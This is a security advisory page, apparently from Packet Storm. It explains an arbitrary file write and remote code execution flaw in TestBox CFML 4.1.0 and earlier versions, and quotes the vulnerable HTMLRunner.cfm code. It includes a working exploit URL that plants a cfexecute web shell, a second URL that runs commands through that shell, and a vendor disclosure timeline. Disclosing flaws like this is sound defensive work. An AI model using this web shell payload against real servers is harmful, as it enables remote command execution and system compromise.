what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TestBox CFML Test Framework 4.1.0 Arbitrary File Write / Code Execution

TestBox CFML Test Framework 4.1.0 Arbitrary File Write / Code Execution
Posted Nov 19, 2020
Authored by Darren King

TestBox CFML Test Framework version 4.1.0 suffers from arbitrary file write and remote code execution vulnerabilities.

tags | exploit, remote, arbitrary, vulnerability, code execution
SHA-256 | 233c49f03cbf8d45807a7927e676676ff08c5611513b7f16a38b6e2269b4f097

TestBox CFML Test Framework 4.1.0 Arbitrary File Write / Code Execution

Change Mirror Download
# Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
# Author: Darren King
# Date: 2020-07-23
# Vendor Homepage: https://www.ortussolutions.com/products/testbox
# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0
# Version : 2.4.0 through to 4.1.0
# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61

About TestBox
------------------------
TestBox is an open source testing framework for ColdFusion (CFML). It is written and maintained by Ortus Solutions, and can be
downloaded/installed as a stand-alone package as well as being distributed as part of Ortus' ColdBox CFML MVC framework (https://www.coldbox.org/).

TestBox is normally deployed in directories "/testbox" (or "/test") under the root of the corresponding ColdFusion/ColdBox application,
and allows users to run CFML unit tests and to generate reports.

https://www.ortussolutions.com/products/testbox
https://github.com/Ortus-Solutions/testbox

As per the vendor, TestBox is meant for development & testing purposes only and should not be deployed to production environments.

Command Injection & RCE
------------------------
The file testbox/system/runners/HTMLRunner.cfm is vulnerable to command injection and can be exploited to obtain remote code execution on the remote host.
The block below shows the vulnerable code:

HTMLRunner.cfm, lines 51-73:
// Write TEST.properties in report destination path.
if( url.propertiesSummary ){
testResult = testbox.getResult();
errors = testResult.getTotalFail() + testResult.getTotalError();
savecontent variable="propertiesReport"{
writeOutput( ( errors ? "test.failed=true" : "test.passed=true" ) & chr( 10 ) );
writeOutput( "test.labels=#arrayToList( testResult.getLabels() )#
test.bundles=#URL.bundles#
test.directory=#url.directory#
total.bundles=#testResult.getTotalBundles()#
total.suites=#testResult.getTotalSuites()#
total.specs=#testResult.getTotalSpecs()#
total.pass=#testResult.getTotalPass()#
total.fail=#testResult.getTotalFail()#
total.error=#testResult.getTotalError()#
total.skipped=#testResult.getTotalSkipped()#" );
}

//ACF Compatibility - check for and expand to absolute path
if( !directoryExists( url.reportpath ) ) url.reportpath = expandPath( url.reportpath );

fileWrite( url.reportpath & "/" & url.propertiesFilename, propertiesReport );
}

If the "propertiesSummary" query string parameter is specified, the CFM page will write a properties file to the specified path with a summary of the tests performed.
The reportpath and propertiesFilename values are both supplied as query string parameters and are unvalidated, meaning that the user can supply an arbitrary filename and have the application output
a CFM file (i.e. propertiesFilename=evil.cfm) within the path of the application.
The user can also specify the "labels" to apply to the test (via the "labels" query string parameter), which are included in the written properties file. Again, these labels are unvalidated and
not sanitized, allowing arbitrary CFML tags and script to be passed to the code. When the properties are output to a CFM file (as per the propertiesFilename parameter), the written CFM
can then be accessed via the browser and any corresponding CFML tags will be executed by the CFML server.
(Note that Adobe ColdFusion often runs as the System user on Windows, which means it might be possible to achieve remote code execution as System in these circumstances.)

Sample URL to write local CFM file:
http://<HOST>/testbox/system/runners/HTMLRunner.cfm?propertiesSummary=true&reportpath=../runners&propertiesFilename=exec.cfm&labels=<pre><cfexecute name="%23url.cmd%23" arguments="%23url.args%23" timeout="5"></cfexecute></pre>

Sample URL to confirm:
http://<HOST>/testbox/system/runners/exec.cfm?cmd=whoami&args=/all

Versions Affected
------------------------
Versions affected (and platform tested on):
- Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61)
- Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-2.4.0+80-201612030044 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)

Timeline
------------------------
2020-07-23 - Reserved CVEs
2020-08-04 - Disclosed issues to vendor
2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close